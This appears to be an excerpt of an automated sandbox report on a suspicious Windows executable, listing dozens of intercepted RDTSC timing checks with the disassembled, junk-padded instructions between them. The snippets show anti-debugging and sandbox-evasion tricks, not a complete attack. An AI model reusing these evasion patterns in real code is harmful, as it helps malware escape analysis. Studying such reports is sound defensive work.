Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B7101 second address: 10B7105 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B7105 second address: 10B7124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1C29045F17h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B72A4 second address: 10B72D0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1C28FAFD68h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F1C28FAFD6Eh 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F1C28FAFD6Ah 0x0000001c rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B7A67 second address: 10B7A6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B7A6B second address: 10B7AB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], ebx 0x0000000d xor dword ptr [ebp+122D2CEBh], edi 0x00000013 call 00007F1C28FAFD71h 0x00000018 or dword ptr [ebp+122D2D6Fh], edi 0x0000001e pop edi 0x0000001f nop 0x00000020 je 00007F1C28FAFD70h 0x00000026 pushad 0x00000027 push ebx 0x00000028 pop ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B7AB3 second address: 10B7AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jno 00007F1C29045F06h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B7AC5 second address: 10B7ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B7ACB second address: 10B7ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B7D46 second address: 10B7D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B7D4C second address: 10B7D56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B7E22 second address: 10B7E2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F1C28FAFD66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B7E2C second address: 10B7E30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B7FA6 second address: 10B7FAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B7FAA second address: 10B7FD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1C29045F15h 0x0000000b popad 0x0000000c push eax 0x0000000d je 00007F1C29045F0Eh 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B805B second address: 10B8075 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1C28FAFD75h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10B9119 second address: 10B9132 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1C29045F15h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10BAC00 second address: 10BAC05 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10BB5B6 second address: 10BB5BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10BB5BA second address: 10BB5FC instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1C28FAFD66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov dword ptr [esp], eax 0x0000000e mov esi, dword ptr [ebp+122D2EB6h] 0x00000014 push 00000000h 0x00000016 mov esi, dword ptr [ebp+122D3621h] 0x0000001c push 00000000h 0x0000001e mov esi, dword ptr [ebp+122D2F50h] 0x00000024 jmp 00007F1C28FAFD77h 0x00000029 xchg eax, ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f pop eax 0x00000030 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10BB5FC second address: 10BB602 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10BB602 second address: 10BB608 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10BB608 second address: 10BB60C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10BB60C second address: 10BB610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10BB610 second address: 10BB622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F1C29045F06h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10BB622 second address: 10BB630 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F1C28FAFD66h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10BCF69 second address: 10BCF7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1C29045F11h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10BE10F second address: 10BE13D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F1C28FAFD66h 0x0000000a popad 0x0000000b jmp 00007F1C28FAFD6Ch 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F1C28FAFD73h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10BDF0B second address: 10BDF12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10BEC42 second address: 10BEC48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10BEC48 second address: 10BEC67 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1C29045F08h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F1C29045F0Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10BEC67 second address: 10BEC7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10BEC7D second address: 10BEC83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10BEC83 second address: 10BEC87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10BEC87 second address: 10BECE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov edi, dword ptr [ebp+122D3639h] 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F1C29045F08h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b mov di, si 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007F1C29045F08h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 0000001Bh 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a push eax 0x0000004b pushad 0x0000004c push ecx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10C2C23 second address: 10C2C29 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10C3AE9 second address: 10C3B1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a sub dword ptr [ebp+122D2CA6h], ebx 0x00000010 push 00000000h 0x00000012 and di, F5D6h 0x00000017 push 00000000h 0x00000019 adc di, AF5Eh 0x0000001e xchg eax, esi 0x0000001f jmp 00007F1C29045F0Ch 0x00000024 push eax 0x00000025 pushad 0x00000026 jnc 00007F1C29045F0Ch 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10C3B1E second address: 10C3B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10C2E26 second address: 10C2E2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10C2E2C second address: 10C2E30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10C5A7C second address: 10C5A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10C5A80 second address: 10C5A90 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F1C28FAFD6Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10C6018 second address: 10C601D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10C3C2B second address: 10C3C2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10C716D second address: 10C719D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 and edi, dword ptr [ebp+122D2E40h] 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 mov dword ptr [ebp+124605D8h], edi 0x00000017 pop ebx 0x00000018 push 00000000h 0x0000001a jnp 00007F1C29045F0Ch 0x00000020 mov dword ptr [ebp+122D2EB1h], esi 0x00000026 push eax 0x00000027 pushad 0x00000028 jo 00007F1C29045F0Ch 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10C6345 second address: 10C634B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10C634B second address: 10C635E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1C29045F0Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10C9210 second address: 10C9232 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD6Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F1C28FAFD6Dh 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10C73C9 second address: 10C73DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F1C29045F06h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10C73DD second address: 10C73E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10C981F second address: 10C9839 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10C9839 second address: 10C9859 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C28FAFD77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10C99D7 second address: 10C99DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10C99DB second address: 10C99DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10C99DF second address: 10C9A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a jng 00007F1C29045F06h 0x00000010 pop eax 0x00000011 pop edi 0x00000012 nop 0x00000013 jmp 00007F1C29045F0Ch 0x00000018 mov bx, 516Ah 0x0000001c push dword ptr fs:[00000000h] 0x00000023 mov edi, dword ptr [ebp+122D34B9h] 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 call 00007F1C29045F10h 0x00000035 mov bx, dx 0x00000038 pop ebx 0x00000039 mov eax, dword ptr [ebp+122D1565h] 0x0000003f add edi, 02135C03h 0x00000045 push FFFFFFFFh 0x00000047 push 00000000h 0x00000049 push ebx 0x0000004a call 00007F1C29045F08h 0x0000004f pop ebx 0x00000050 mov dword ptr [esp+04h], ebx 0x00000054 add dword ptr [esp+04h], 00000016h 0x0000005c inc ebx 0x0000005d push ebx 0x0000005e ret 0x0000005f pop ebx 0x00000060 ret 0x00000061 mov dword ptr [ebp+124623E0h], ebx 0x00000067 nop 0x00000068 jmp 00007F1C29045F15h 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 jng 00007F1C29045F0Ch 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10C9A7D second address: 10C9A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CC90A second address: 10CC933 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F1C29045F16h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F1C29045F06h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CC933 second address: 10CC937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CC937 second address: 10CC93D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CC93D second address: 10CC942 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CA95D second address: 10CA961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CC942 second address: 10CC97C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov bx, 2488h 0x0000000c push 00000000h 0x0000000e mov dword ptr [ebp+122D2B96h], esi 0x00000014 mov edi, esi 0x00000016 push 00000000h 0x00000018 or ebx, dword ptr [ebp+122D2F6Fh] 0x0000001e sub dword ptr [ebp+12451761h], edi 0x00000024 xchg eax, esi 0x00000025 push edx 0x00000026 jmp 00007F1C28FAFD6Dh 0x0000002b pop edx 0x0000002c push eax 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 push ebx 0x00000031 pop ebx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CAA57 second address: 10CAA5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CAA5C second address: 10CAA62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CB90E second address: 10CB947 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1C29045F06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F1C29045F13h 0x00000010 jp 00007F1C29045F06h 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F1C29045F0Fh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CE89E second address: 10CE8A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CE935 second address: 10CE93B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CF9EE second address: 10CF9F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10D09D3 second address: 10D0A36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F1C29045F08h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov di, ax 0x00000029 mov edi, dword ptr [ebp+122D3479h] 0x0000002f push 00000000h 0x00000031 mov dword ptr [ebp+12450869h], ebx 0x00000037 jmp 00007F1C29045F0Ch 0x0000003c push 00000000h 0x0000003e mov edi, 3C83A524h 0x00000043 xchg eax, esi 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jne 00007F1C29045F06h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10D0A36 second address: 10D0A3C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10D2945 second address: 10D2999 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1C29045F0Ch 0x00000008 jns 00007F1C29045F06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 clc 0x00000014 push 00000000h 0x00000016 mov ebx, dword ptr [ebp+122D337Bh] 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007F1C29045F08h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 ja 00007F1C29045F07h 0x0000003e xchg eax, esi 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F1C29045F0Fh 0x00000047 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10D2999 second address: 10D29CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F1C28FAFD75h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F1C28FAFD6Fh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CFB93 second address: 10CFC1F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1C29045F06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push ebx 0x0000000d push esi 0x0000000e jmp 00007F1C29045F19h 0x00000013 pop esi 0x00000014 pop ebx 0x00000015 nop 0x00000016 mov ebx, 7A4EAFD6h 0x0000001b push dword ptr fs:[00000000h] 0x00000022 sub edi, dword ptr [ebp+122D2868h] 0x00000028 mov dword ptr fs:[00000000h], esp 0x0000002f movzx edi, bx 0x00000032 mov eax, dword ptr [ebp+122D0D61h] 0x00000038 sub dword ptr [ebp+122D1C54h], ecx 0x0000003e push FFFFFFFFh 0x00000040 push 00000000h 0x00000042 push edx 0x00000043 call 00007F1C29045F08h 0x00000048 pop edx 0x00000049 mov dword ptr [esp+04h], edx 0x0000004d add dword ptr [esp+04h], 00000017h 0x00000055 inc edx 0x00000056 push edx 0x00000057 ret 0x00000058 pop edx 0x00000059 ret 0x0000005a mov di, dx 0x0000005d nop 0x0000005e jnl 00007F1C29045F0Eh 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 push edi 0x00000068 pushad 0x00000069 popad 0x0000006a pop edi 0x0000006b rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CEAAC second address: 10CEAB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeRDTSC instruction interceptor: First address: 10CEAB0 second address: 10CEB58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1C29045F10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F1C29045F08h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 jmp 00007F1C29045F12h 0x0000002c push dword ptr fs:[00000000h] 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007F1C29045F08h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 00000017h 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d mov dword ptr fs:[00000000h], esp 0x00000054 mov dword ptr [ebp+122D193Ch], edi 0x0000005a mov eax, dword ptr [ebp+122D0DC5h] 0x00000060 sub dword ptr [ebp+122D1BB1h], ecx 0x00000066 push FFFFFFFFh 0x00000068 sub dword ptr [ebp+122D2E48h], ecx 0x0000006e nop 0x0000006f pushad 0x00000070 ja 00007F1C29045F11h 0x00000076 jmp 00007F1C29045F0Bh 0x0000007b push eax 0x0000007c push edx 0x0000007d ja 00007F1C29045F06h 0x00000083 rdtsc
